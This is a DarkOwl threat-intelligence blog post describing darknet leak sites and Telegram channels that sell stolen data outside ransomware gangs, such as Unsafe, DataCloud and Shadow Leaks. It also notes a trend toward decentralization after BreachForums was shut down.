
Cue DarkSonar, DarkOwl’s latest product: a relative risk rating that considers the nature, extent, and severity of credential leakage on the darknet to give a company a signal that measures its exposure.

In this webinar, attendees:

  • Reviewed the latest stats around the growth of cyberattacks
  • Learned why modeling risk is essential for all organizations of any size
  • Learned how DarkSonar can inform threat modeling, third party risk management, and cyber insurance
  • Saw first hand how DarkSonar can potentially predict the likelihood of cyberattacks

For those who would rather read the presentation, we have transcribed it below. Or, watch on YouTube.

NOTE: Some content has been edited for length and clarity.



Data for Sale on Leak Sites

May 23, 2023

DarkOwl analysts have observed the emergence of leak sites that are dedicated to simply posting leaked data and are not affiliated with known ransomware groups. These leak sites are similar to other darknet marketplaces and forums, but they specialize in selling other people’s data and usually don’t sell other products like malware, drugs, or weapons. The leak sites described here should not be confused with the leak sites and victim blogs used by ransomware gangs.  

Ransomware Services

Ransomware gangs use victim blogs or leak sites as part of what DarkOwl refers to as Ransomware Services: the services related to ransomware threat actors, where victims are announced and their data is leaked if they do not pay. Typically, a ransomware gang will publish the victim’s name, details, and part of the stolen data as proof of its legitimacy. 

Figure 1: Post to Ransomware Gang Leak Site; Source: Daixin Team Tor site, via Tor Browser

Leak sites are also used as a means of communication between ransomware groups and their victims to conduct negotiations. In figure 2, Royal ransomware group’s leak page includes a contact form at the top with a list of victims below. That way a victim can check if the sample of data provided is legitimate, and then contact Royal.

Figure 2: Contact Form on Royal Ransomware Leak Site; Source: Tor Anonymous Browser 

Leak sites and victim blog sites are used by ransomware groups as part of their double-extortion technique. In a double-extortion attack, a ransomware gang encrypts the victim’s files and demands a ransom payment for the decryption key, but first exfiltrates the data to its own infrastructure. The gang then threatens to publish the sensitive data on the darknet or sell it to the highest bidder. Sensitive data published on the darknet or purchased by a darknet actor exposes the victim to follow-on attacks, such as targeted social engineering and phishing.

Leak sites are a type of darknet marketplace, but they sell only data. Other darknet marketplaces sell a variety of products such as malware, cracking tools, drugs, social engineering and phishing methods, job postings, website penetration testing, detective services, and occasionally weapons. Those marketplaces also sell leaked data (CVVs, ID cards and passports, company data, personal data from apps, etc.) alongside their other merchandise. Large marketplaces host many vendors and usually include a forum section. The leak site DataCloud, by contrast, carries only data uploaded by the admin rather than by multiple vendors. Leak sites can be more decentralized and run by fewer individuals than other darknet marketplaces. Furthermore, DarkOwl analysts identified that each of the leak sites analyzed has a robust Telegram component.

The reliance on Telegram is a distinct feature of leak sites that traditional darknet marketplaces lack. The Telegram channels associated with a leak site are typically run by the site’s administrator, and data can be bought and sold on some of them. The biggest difference between a Telegram channel and a darknet marketplace is the lower bar to entry: a marketplace will usually require a username, password, and an anti-phishing captcha, whereas anyone can join a public Telegram channel. Potentially less sophisticated users with little darknet know-how can learn about and use the markets from their Telegram channel, as can law enforcement and bots.

Leak Sites

DarkOwl analysts have seen the emergence of new leak sites which differ from leak sites and victim blogs associated with ransomware groups because they are not affiliated with any specific ransomware or hacker group. These act as third-party vendors of leaks and leaked information. Many sell stealer logs, accounts, combo lists, and proxies as well as dumps of leaked data. Accounts available for sale include accounts to VPNs, pornographic sites, streaming services, and mail access. Data can be purchased directly from the darknet leak site or from its Telegram channel. The Telegram channels attached to leak sites are for discussion and are where users can ask for data or DM the admins.

Unsafe

A leak site known as “Unsafe” calls itself a security blog with “published personal data leaks, commercial and military secrets, and compromising information on famous people and public organizations.” They include a disclaimer that they are not a hacking team, but all their data is from hackers. According to them, their blog is a platform for buyers and sellers as well as a middleman service to help parties negotiate (for a fee). 

Each listing keeps a count of the number of times the data has been viewed, the size of the data offered, a link to the company’s website, the company’s revenue, and its country of headquarters. “Proofs” are uploaded for each targeted company. Data in these proofs includes full passport photos, ID cards, personal information, sensitive company information, sensitive HR information, financial information, screenshots of texts, credit cards, graphic pictures (including pornographic imagery), and more. Interested buyers can get in contact to buy the data through the Tox IDs provided, one for support and another for a sales manager. All of the data posted is listed as having been compromised on either October 23, 2022, or November 26, 2022. DarkOwl has not verified the authenticity of any of the data provided on this site.

The information included in the proofs are open to everyone to view. This could indicate that the data in the proof may be used to attract other cybercriminals to encourage them to buy the full data-set which they can leverage for their own criminal means.  

Figure 3: Home Page for Unsafe Security Blog; Source: Tor Anonymous Browser 

DataCloud

The leak site DataCloud offers combolists, stealer logs, logs, and account access to e-mail services. Interestingly, access to a Yahoo mail account is the only product for sale (for $120); everything else in the listings can be downloaded directly. Analysis indicates that users join the site via a subscription-based model. All data on the site is uploaded by the admin. DataCloud has multiple associated Telegram channels, which appear to serve different purposes.

Figure 4: DataCloud advertising Combo Lists and Leaked Data; Source: Tor Anonymous Browser 
Figure 5: DataCloud Subscription Options; Source: Tor Anonymous Browser 

One Telegram channel is linked under the “Telegram” tab of the site and is used by the admin for posting what appears on the site. In this channel the DataCloud admin directs users to their site, referred to as their forum. Only the administrators post in this Telegram channel.

Figure 6: DataCloud Associated Telegram Channel; Source: Telegram 

The other Telegram channel is linked under the “chat” tab and acts as a forum for the site’s users and visitors. Many darknet marketplaces have a forum component where users can post questions, comments, or anything they want to about the marketplace and beyond. This Telegram channel attached to “chat” is essentially the marketplace’s forum but run on Telegram. This channel is still run by the DataCloud admin; however, it is used by members to request specific data from each other or to advertise data they have. This channel can be used to facilitate direct deals, either for free or for a fee, between users.

Figure 7: DataCloud Associated Telegram Channel; Source: Telegram 

Leak sites that use Telegram channels in conjunction with their website can use feedback and requests from Telegram to curate their data to their customers’ needs. DarkOwl analysts have observed that Telegram plays an integral role in the new leak sites used purely for downloading and purchasing data. Telegram appears to be more integral to leak sites than to other darknet marketplaces, almost as if it were an extension of the leak site itself rather than an auxiliary channel.

SQLi Cloud

A leak site that uses a similar structure to DataCloud is SQLi Cloud. This site focuses mainly on stealer logs and combolists, which are largely offered for free. Requests can be posted in the Marketplace section, where other users can respond.

Figure 8: SQLi Cloud Offers Stealer Logs; Source: Tor Anonymous Browser 

Similar requests to those found in the marketplaces section of the SQLi site can also be found on their Telegram channel. In this Telegram channel an account called “SQLi administrator” posts updates and responds to others in the chat. The channel is also used for requests for specific datasets. However, as with anywhere on the darknet, users must be wary of scammers.

Figure 9: SQLi Associated Telegram Channel; Source: Telegram 

Leak Sites on Telegram

“Cracked group” is a Telegram channel offering data for sale. The data found on this channel ranges from streaming data and stealer logs to data identified by the country it has been taken from e.g., “Vietnam data.” There is an admin for the channel which moderates the channel and posts details of the data available.

Figure 10: Cracked Group Telegram Channel; Source: Telegram 

Unsafe, DataCloud, and Cracked rely mainly on Telegram or have a site with just a few pages built out. In this aspect they are more informal or sparse than would typically be found on a darknet market. All have a Telegram channel. Those with websites have a main marketplace to download data and links to Telegram channels or contact information. Most have an “About Us” page.

Other leak sites are sophisticated marketplaces and forums specializing in the sale and downloading of leaks and personal data. This category includes sites such as Shadow Leaks. Shadow Leaks has the infrastructure of a traditional darknet forum and has features like awards, credits, a forum, and even sponsors. This site offers a larger product suite. Aside from leaks and combolists, products such as programming courses, hacking tutorials, dorks, and more are available.

Figure 11: Shadow Leaks Site; Source: Tor Anonymous Browser 
Figure 12: Data Offered on Shadow Leaks Site; Source: Tor Anonymous Browser 

The sites and Telegram channels covered in this blog post are just a fraction of what is available on the darknet and darknet-adjacent sites in terms of leak sites. Some of them specialize in one area of stolen data, such as only selling credit card information. Or a site will focus on certain parts of leaked data, like stealer logs, and sell them with a few other products.

While selling personal data on the darknet is not a new concept, DarkOwl analysts have noticed a trend of sites that specialize in selling leaked or personal data which are smaller than more well-known marketplaces, yet almost exclusively dedicated to leaked data.

These sites release their leaked information differently from ransomware groups. A wide variety of products for sale such as drugs and malware are not offered. Instead, the leak site focuses almost exclusively on personal data. They have decided to specialize in offering leaked data even though they are not ransomware gangs nor are they ransomware affiliated.

Final Thoughts  

As the widely popular BreachForums (Breached) was recently shut down following law enforcement action, the darknet community will be keen to see who takes its place. BreachForums offered a massive amount of data in one place, could vet the data posted, and was viewed by users as a trustworthy middleman service to facilitate transactions between vendors. While it offered accountability for buying, selling, and downloading leaked data, its centralized nature also made it a massive target for law enforcement. The rise of leaks-focused Telegram channels and sites could point to a trend of decentralization. Relying on a hub-and-spoke model of decentralized darknet networks and darknet-adjacent channels offering leaked data would put darknet users at higher risk of being scammed, but at potentially lower risk of the site being taken down by law enforcement. Overall trends point to small groups and individuals selling leaked data, not just ransomware groups, highlighting that there are more decentralized avenues for individuals to buy, sell, and download leaked data.



Copyright © 2024 DarkOwl, LLC All rights reserved.
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.